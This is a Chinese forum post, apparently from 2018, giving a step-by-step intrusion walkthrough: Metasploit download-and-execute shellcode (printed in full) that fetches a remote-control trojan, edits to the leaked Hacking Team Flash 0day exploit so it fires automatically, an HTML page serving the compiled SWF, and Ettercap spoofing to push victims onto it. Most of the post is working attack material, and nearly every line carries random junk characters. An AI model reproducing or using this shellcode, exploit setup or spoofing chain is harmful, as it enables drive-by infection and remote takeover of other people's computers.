|
9 h0 ?' s" Y% Q* d" x+ e. g7 j! M6 s 三、flash 0day之手工代码修改制作下载者实例入侵演示 g$ n- s, H! C" l& Y
) g* D+ t# Q' R" B% |. p% B& v1 F6 p$ w; X
利用到的工具:
( G. o6 v$ Y4 V3 | d1 ^. x$ I6 s( M* Y
3 J' v, O- J( |1 t* b- T1 H5 |& d
Msf 4 s3 P1 k6 @; E, ^- m
3 B- }$ b: k [$ s: T$ l, Y- t6 e3 ^2 D9 Y& |6 \, `
Ettercap
/ o0 n& e1 K& U
: D+ c; A) k9 [6 b& e4 O: z5 i% K& t( j- r* r# U/ e
Adobe Flash CS6
2 H2 [; |' ^: [/ k0 X
7 P# ~9 h( F) ^3 ^) _, h4 A5 E
4 p+ G0 [9 R1 S" G' P% M' \ Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 5 F. T6 K1 L3 { N; ^9 v$ P
. A- Y n4 }5 T! `1 I5 ^) m3 d3 n8 H2 ~+ Y
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options 8 L2 n+ u; }) ^2 P, b2 d
9 k: j9 S( m+ F9 |+ w4 O8 c8 O
0 A# l2 ?! p; M: b# l! o 如图: / k9 Z8 Y' f3 s8 I' _
, `6 U6 l4 K& I# O' ]: ?, U; E8 F% j
' B& E4 o: E% Y. u9 H1 W) X
# [ g+ U8 Q& M% q3 W x3 I
$ J. e" x* K C3 X" j- k 
- N, f3 g" [ Z
2 a2 Y$ u: H8 o% ^3 M, W: N
! a, I, b' C4 Z4 G2 ] 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: / N- p Z, ~3 @( m' r
* S* W o* ~% U# G# \, R
{ [% W2 T, Q$ g3 R0 V
% q) [ r( R; l# }- F% \9 d : d& j6 F% N) n v3 Y* Z3 x
# s2 {, u+ v$ {" X$ ?: K" h 
2 _' N5 m- |" f+ ?5 W$ n- k
$ k0 N& L0 s* a" Q7 q% B. L `5 ^
然后执行generate -t dword生成shellcode,如下: R4 ~0 v/ r' y
3 f$ C+ J$ D. T, d2 Z
& O v( p: ]( l0 L) \+ ? 
% |* ?+ B, N' Z9 t
2 H0 \7 z8 o- X4 [2 a! X1 @ G& J! K, q. Z
复制代码到文本下便于我们一会编辑flash exp,如下:
5 R% t2 s/ a& k9 B) j- H . {8 _- I& `* [# M5 z; c5 \
u* Z% G4 I; M7 ]% [
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, " i7 @$ H: e- C2 a8 j
8 k! k) k3 G* b& g. V
8 G, g! b/ N4 f% d
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, " o b( [9 T( q% f/ o# c
5 |, m" v9 h, U
% P+ T4 s& G7 |! o7 k5 T* P
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
$ A6 k- w; w3 U/ S* O* o
4 t3 `! o- \' c: A+ S6 z9 G" c, g% T8 M% z. _9 \; f* z
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, % B* w0 X; S; a) ~" v
; k4 ?( z0 ?" [0 J
5 H1 y! d8 p8 ~+ h 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, $ [6 q+ e; M/ i, r, u1 ?, s
( T6 a8 y3 c! E7 J* F" c( \& ^
# z |: ?* S& l+ y+ k 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
f# G, r V4 R % t5 n6 R$ U5 k1 c2 X6 e: }' R% U% u
& w" k! [* \1 O8 N5 n$ M; U
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 9 ]* F0 e4 J) i5 [$ w" h2 n
2 o4 k1 |0 p& h% i7 b5 e8 K$ b
, A* ^$ v: B' z 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
/ b% ^0 N# f5 k3 Y8 i! |7 s. F& y& n
3 q" J6 o( u- b* [9 g3 g6 y) S: m, c- f* h6 ?1 D
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, . t$ o% h. k& [5 C% W$ |
( t0 k) A4 t% V( t5 ~
: m: z/ G9 _( K5 H- j( Z! C/ B
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 3 F8 }7 L+ Y& b! E9 h
6 P9 g1 P# F5 f% M* t
/ y$ P, [( b- j& ?4 Y' O
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 4 z6 C& d4 {2 B, h
1 t5 |' X3 b; N" [+ U
' x4 T- m, L+ y
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, - y0 N9 c! T# G
* _2 w) X0 S; H) G% @5 R8 e. g3 U3 F9 O1 B
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 3 {5 ^$ v" D' \# _
8 p K! e% c$ t p# } U1 ^: \
}% i" r I# F8 U
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
2 M4 {: o( C( O' O, {% U" z& M1 I. ?
7 p% l. Z' z0 L/ E) t
1 H) n! L1 Y. p+ ^, ~. [
! M. s0 E% D; R6 v* {
% a8 |+ E& G& q" P9 y
_# s0 ^9 K% b6 E: J 3 ^3 r' w, k7 M/ A: r! j0 c
% U, N, Y q! w7 ?- t# k7 h' J
4 D$ @4 b# p; V' ]1 ?, ] 下面我们来修改flash 0day exp,需要修改三个文件,分别为: ) s U" u* n6 X0 z5 o" W2 I
, n) A7 z7 o7 n; w, h9 v
+ ]# `5 d' z _% B- ] 
0 G: `+ u& s( A7 [( M. {/ l( i ) h7 B4 E4 d) z3 }
- O$ ?+ t* k# @( o( n 先修改ShellWin32.as,部分源代码如图: * v" t/ o8 V. X. I
/ e% ^7 a) ?% b' x5 [
- x8 P! o4 b5 k' W) |
4 o, l1 ` F9 c 6 }6 J7 Z% L/ G7 A: z5 K
* o$ _7 ~- |% q: ]/ r+ n' r
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: . W1 N/ r( b( d7 [3 l Y5 ~6 Q
7 W+ ]8 \, [1 c9 y+ l: W" C- p* x3 N# y% e E! M# {6 `4 C
 : i$ s% }; F5 {) X" ]
* X# K4 m" m F/ X
2 h0 q( C3 g" a& k 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: , }0 v) w9 ^! D7 Y% R, i$ e0 ?
7 u0 g& r6 S3 a6 ]& `$ r# Q5 [5 a b7 O" K
' L6 N. a1 L' E- Q + O7 ]+ A7 g& R1 ]
7 F! l- y# F' N! p* `; `* M; k 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
6 @' G9 R! [$ x1 W% U! L
( q" j9 ~! ?1 R+ @) Y2 E7 N9 ^( y+ Q s3 N3 @. S
) R: V; n* p& W' A. r- l1 y
1 f: L4 [, D# Y9 P0 `9 \( ^- {
. | ?: H- ]4 ?* X3 u6 e4 I0 } / g7 e9 o9 H2 b: n: r# d; x- t2 o
, ]3 t2 b0 t) T1 y5 Q: ^4 y1 i- n( O
5 D: b3 ^+ a5 L( t# w% H 
0 t+ M; V" x# `: r- K* H( ]8 j
! w( z" E9 A1 Q5 J- r# x, U' F
. o; V- @: O3 P7 Z( y 然后点保存,下面我们来编译一下,打开 $ p! N" y# u9 s
5 q; M: U2 x2 \2 w% G
- g/ m8 W) _ b2 O6 q6 P exp1.fla然后点文件-发布,看看编译没错误 3 A# I7 G! M& O* Y* l% M+ T
7 f) } Z/ h) X3 o9 m& L- {
. m' u# G( y) ? ^& a$ g8 i" Q
( `, A9 J8 [. Y 8 w, E! b- A- T! w0 H& w
2 }. T& ^ n; E* t! w- M; i
; n0 ` E7 p' `/ h9 ^, Z, B! Z8 l 5 F2 n! h! f5 `- ?
% X9 Q* D" w9 P y5 b5 H0 P9 { ' M; c" c# M" a4 F E' _
: l0 n9 _8 I* |5 T2 w7 D' j
9 j+ F- f4 s6 p( ?' |7 G- W 
. [1 W6 |! e% Z
5 M9 x3 c" \) J" i/ A; l2 {8 f A3 _9 {: |% e
然后我们把生成的 7 z& X# k0 y4 H
$ `% s' [2 X+ Z/ u. Q9 h" o$ {3 D4 z( T9 _* I- o0 y
exp1.swf丢到kailinux 的/var/www/html下:
. N5 Z" j" M' {" K: b4 S7 h5 y( M . i" Q+ F, C& g6 c$ W7 A+ r
7 w* {- T ^2 Z4 Q 然后把这段代码好好编辑一下
6 ^. {& _( k6 @2 B! T3 g N5 S 1 d! }1 Y9 y# D0 P
' \' Z9 Y: u; Z5 a
$ }+ B8 ^1 J. o" ?' q p& R
/ x/ A' g" m9 t3 B+ M+ i( ^
0 ^) S1 M8 L2 p9 B& k$ x6 T ) R! c. X2 J$ m: S
" D1 z$ m6 w2 p0 p4 \
2 {' O6 Z- u8 T0 T0 G; x, M$ M+ @
4 J1 `2 M3 _2 N0 }! {) e
5 H. F l% t* j# ~4 F( Z' Y% {0 H2 \' Z0 A7 @5 p, x1 R% X, x
2 `0 |) K. u3 Y" S$ c( n
' n& c( r9 \; j& V
: d. u5 M8 n# l3 o8 L, o
0 w3 y3 f# A' Y. W9 P8 x
4 w3 v, c+ G8 w
7 h# S+ Z7 A) s6 }7 B u+ l ^& e* `* c& a% L* n* j; j
/ [( |2 s" R3 I/ I9 f6 v
+ M$ r& b, b% A0 n" b+ r, a
<!DOCTYPE html>
; E, `8 h' i$ s( l. a* b. p! R " v$ w! H4 ]# Z/ w% W/ i
' i0 u: |( M. p$ q8 N, b
<html>
( }- f/ G+ e7 f) U9 X * a& N4 Q8 n" Z: Q: p
0 I" a! u( Q2 F& U/ W1 T4 V
<head> 3 M% {* L' f3 R. R
+ _- \& I0 f% f" r8 W
( Y$ a3 T$ c& B- K) E6 `" o0 N& X
<meta http-equiv="Content-Type" content="text/html; " |8 ^- q* i% i3 u5 P5 J
`0 Z+ a3 r% |/ n( L2 U1 h+ o& W
0 i5 P* W0 I9 n2 X+ l' ? charset=utf-8"/> + Y% \4 ?, W7 p7 e7 G9 \. N6 e. X
& O$ s! j" H! [8 b( Q: d/ P
0 C0 g3 q P' a i% M </head> $ k- H4 b; q; `, F) d1 }1 M
" g- h# k/ K; M. N" @% [
! K# V8 |: ~/ u2 D7 e <body> * e' K3 W% P8 L+ M$ R( ]
( s3 A# ^6 T7 m$ [
* H# a J# h" s2 c9 f
<h2> Please wait, the requested page is loading...</h2> Q6 T0 I, P$ _2 r6 l4 n" e
7 x- X5 J% Z1 f9 F& Q s. B
- y' h* \6 E* l% ~: Z* D2 g <br> 4 W2 \+ }% m4 | U2 s6 c1 [
8 ^1 E& w7 r" V% \
- a: V2 I3 i: U( K3 M% C& \ <OBJECT
8 \' f0 c1 \7 x0 e2 M ; b+ v: q# G, C( u# q- t2 h1 t
! R# f- }* |2 M5 `7 G
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie " M2 \8 w7 R! P! V
0 r' ^3 Z, I; G' D5 r7 A" o' b L+ f% ^. B1 x
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
' z3 ~; p' \! D+ j+ E; w& L" O ! B/ I$ Y5 g5 w
9 N( P2 D& r/ K# X
</body>
, a, p {: K3 O o$ I/ v7 S
1 I( `% X' v6 W& `7 D5 l. x. N* R, T" [5 j8 y; Y9 Z
<script>
9 J! t, X, B" i! Z" g5 x 8 x6 i* O( ?6 }
/ W, G0 w& ^3 p2 Z/ G% z4 }
setTimeout(function () { : s4 U! N9 g2 |! c
5 o5 _1 d% k6 Z; h6 X$ P
1 U$ u f5 z6 w' B6 @; R
5 u% ~/ Y, r* U# K! [, X. X : W: P- u. b3 i
9 j& o) K% Z% F5 [# e
window.location.reload();
( k, O( D! [* T% U( w+ V
* y6 N, y1 ?! |7 N. R8 z8 T: n, v) f7 ~- L
}, 10000);
( z. P' t6 C* ]& {' f% b3 J & A, Q8 i8 M+ N6 |* }8 m. t
. L0 e& ~* p" C1 {- A* {
+ s; \: D: \, w$ w9 y/ S7 m& z
8 e% e7 i& k2 c9 [8 p# q
# M/ T/ V) r* A3 Z </script> ; \/ M* ] _+ H# x
6 y4 g: D# B% w* v
5 S9 m0 z0 {2 \! ~ </html> 7 X0 o8 B9 M' P5 e8 c# S' L
3 e1 ?0 `: o. [0 Z- @1 W8 b) U- m8 z9 W8 H% _7 R# [. p
8 c/ a3 z% g2 G+ T2 w
1 Q u" B- Y1 G0 R2 g. u& Z3 N
/ r$ g! B+ o9 F2 ?0 ~. y
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
/ }% C g, x( d; }) v; S3 z / u# m. m5 ~) x' g* J H# h
! K1 p* H9 f {* i' s F/ H  ) F" O1 B: J' x
& U) _. i: R% B$ F: Q; T; Y
. q0 t1 c7 i" B5 w2 o' }
' h9 e h. e- S, ?! u9 H2 a
5 C l' I$ v# \! ]6 Z+ P& x/ f" u. l
# j; m: ?% @/ u3 E& h; s
; b; M" ^4 {! }3 n/ m, O
3 w- @1 O1 M: J+ S( Q: R " {2 N$ E$ x0 F: @" L
& _' E6 q+ K! D' }7 U3 L8 w# K
) B/ M) M% s7 P! a4 }. K/ } ]
6 D% V6 }8 _4 ~1 V: c4 Z
* N( E3 J( r& t5 u
. i# y7 j. `1 X6 f, c- [" ]" k 下面我们用ettercap欺骗如图:
. X$ M4 @( c! M6 b
# ~$ w, j- y( P' Q9 J
$ W% Q+ ^- f( Z 
6 X1 U: n- ?2 ?7 Q. o
9 `/ ?0 h1 G, q X
4 Y9 y& ]7 k V; ]; B! x+ U! O - B8 `& G7 @5 G U
+ }/ o* s+ }4 O$ X
4 e) p/ r5 _" m6 v2 G 下面我们随便访问个网站看看:
# p: ~5 ~, Q9 ?# l9 T! z ) q3 B+ j1 {5 h2 g8 u: \
! c: p$ i& `* c' Q0 y, D
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
2 ]$ S F( b! U
3 `7 i) }- U" n1 o% V+ J! {2 n% k
- ^ l4 a/ [- t8 g. M% E0 s# w  0 `3 e- ~! W, w: j. m# r+ m% D) `
; `' f3 q6 u2 _0 Z
% |; h) J- W, J A6 S) J
我们看另一台,
4 B$ F/ C7 }; j( C& {/ t- }! l
& ^1 X S$ f+ j$ \' V' a6 A. }2 ]; y9 Y$ {) [
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 , Q4 q, X# ?/ N% V5 \; _
| 
发表于 2018-10-20 20:28:55
收藏
支持
反对